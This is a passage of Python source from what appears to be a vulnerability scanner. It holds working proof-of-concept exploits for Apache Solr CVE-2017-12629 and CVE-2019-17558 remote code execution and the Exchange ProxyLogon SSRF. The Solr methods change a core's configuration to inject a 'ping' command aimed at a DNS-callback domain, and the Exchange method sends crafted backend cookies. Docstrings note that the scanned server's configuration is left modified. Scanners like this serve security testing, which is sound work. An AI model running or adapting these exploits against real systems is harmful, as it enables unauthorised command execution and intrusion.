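        self.vul_info["vul_type"] = "Remote Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = (
            "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法"
            "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
        )
        self.vul_info["cre_auth"] = "zhzyker"
        core_name = None
        new_core = random_md5()
        dns = dns_request()
        cmd = "ping " + dns
        payload = self.payload_cve_2017_12629.replace("RECOMMAND", cmd).replace("new_core", new_core)
        url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
        headers = {
            'Accept': "*/*",
            'User-Agent': self.ua,
            'Content-Type': "application/json",
        }
        try:
            request = requests.get(url_core, headers=headers, timeout=self.timeout, verify=False)
            try:
                core_name = list(json.loads(request.text)["status"])[0]
            except (ValueError, KeyError, IndexError, TypeError):
                pass
            req = requests.post(self.url + "/solr/" + str(core_name) + "/config",
                                data=payload, headers=headers,
                                timeout=self.timeout, verify=False)
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [newcore: " + new_core + "] "
            elif request.status_code == 200 and core_name is not None:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe] [newcore: " + new_core + "] "
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])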
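def cve_2019_17558_poc(self) -> None:
    """Probe Apache Solr (5.0.0 - 8.3.1) for CVE-2019-17558 (Velocity template RCE).

    Lists cores, enables ``solr.VelocityResponseWriter`` with both resource
    loaders on the first core through ``/solr/<core>/config``, then requests
    ``self.payload_cve_2019_17558`` (``RECOMMAND`` -> ``ping <dnslog-domain>``)
    against that core.  A DNS callback is a confirmed hit; with no callback
    but a discovered core the result is reported as "maybe".

    Caveats:

    * The Config API POST is a configuration change on the scanned core and
      nothing in this method reverts it.  Only run against systems you are
      authorised to modify.
    * ``ping`` without a count does not terminate on Linux.
    * NOTE(review): ``vul_date`` is recorded as ``2017-10-16`` for a 2019
      CVE; it looks copied from the CVE-2017-12629 PoC and is left untouched
      because the correct date is not visible here.

    When no core is found ``core_name`` is ``None``; the original then raised
    a TypeError while building the success message -- ``str()`` is used now.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace("RECOMMAND", "whoami")
        self.vul_info["vul_name"] = "Apache Solr Velocity template Remote Code Execution"
        self.vul_info["vul_numb"] = "CVE-2019-17558"
        self.vul_info["vul_apps"] = "Solr"
        self.vul_info["vul_date"] = "2017-10-16"
        self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Remote Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
        self.vul_info["cre_auth"] = "zhzyker"
        core_name = None
        dns = dns_request()
        cmd = "ping " + dns
        payload = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
        url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
        try:
            request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
            try:
                core_name = list(json.loads(request.text)["status"])[0]
            except (ValueError, KeyError, IndexError, TypeError):
                pass
            core_url = self.url + "/solr/" + str(core_name)
            headers_json = {
                'Content-Type': 'application/json',
                'User-Agent': self.ua,
            }
            set_api_data = """
            {
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }
            """
            try:
                config_res = requests.post(core_url + "/config", data=set_api_data,
                                           headers=headers_json, timeout=self.timeout, verify=False)
                exec_res = requests.get(core_url + payload, headers=self.headers,
                                        timeout=self.timeout, verify=False)
                exec_dump = dump.dump_all(exec_res).decode('utf-8', 'ignore')
                config_dump = dump.dump_all(config_res).decode('utf-8', 'ignore')
            except requests.exceptions.RequestException:
                # The injected ping can hold the second request open until it
                # times out; the DNS callback still decides.
                exec_dump = "timeout"
                config_dump = "timeout"
            if dns_result(dns):
                self.vul_info["vul_data"] = exec_dump
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [corename: " + self.url + "/solr/" + str(core_name) + " ]"
            elif core_name is not None:
                # Original also tested prt_resu != "PoCSuCCeSS", which is
                # always true on this branch.
                self.vul_info["vul_data"] = config_dump
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])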
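def cve_2021_26855_poc(self) -> None:
    """Probe Microsoft Exchange for the CVE-2021-26855 (ProxyLogon) SSRF.

    Requests ``/owa/auth/x.js`` twice with crafted ``X-AnonResource`` /
    ``X-BEResource`` cookies.  First the backend host is set to a fresh
    dnslog domain: a DNS callback seen by ``dns_result`` confirms the SSRF.
    Failing that, the backend is set to ``localhost`` and an HTTP 500 whose
    body contains ``NegotiateSecurityContext failed with for host``,
    ``TargetUnknown`` and ``localhost`` is reported as "maybe".

    NOTE(review): the recorded ``vul_desc`` describes the post-auth file
    write that this SSRF is chained with, not the SSRF itself; it is left as
    written.
    """
    with self.threadLock:
        self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
        self.vul_info["vul_numb"] = "CVE-2021-26855"
        self.vul_info["vul_apps"] = "Exchange"
        self.vul_info["vul_date"] = "2021-03-03"
        self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "SSRF"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
        self.vul_info["cre_date"] = "2021-03-07"
        self.vul_info["cre_auth"] = "zhzyker"
        url = self.url + "/owa/auth/x.js"
        dns = dns_request()
        cookie_local = ("X-AnonResource=true; "
                        "X-AnonResource-Backend=localhost/ecp/default.flt?~3; "
                        "X-BEResource=localhost/owa/auth/logon.aspx?~3;")
        # Both backend references are repointed at the dnslog domain.
        cookie_dns = cookie_local.replace("localhost", dns)

        def probe(cookie):
            """GET the OWA resource with ``cookie`` and return the response."""
            headers = {
                "User-agent": self.ua,
                "Cookie": cookie,
                "Connection": "close",
            }
            return requests.get(url, headers=headers, timeout=self.timeout, verify=False)

        try:
            res = probe(cookie_dns)
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = cookie_dns
                self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + cookie_dns + "]"
            else:
                res = probe(cookie_local)
                backend_error = (res.status_code == 500
                                 and "NegotiateSecurityContext failed with for host" in res.text)
                if backend_error and r"TargetUnknown" in res.text and r"localhost" in res.text:
                    self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info["vul_payd"] = cookie_local
                    self.vul_info["prt_info"] = "[ssrf] [maybe] [cookie: " + cookie_local + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])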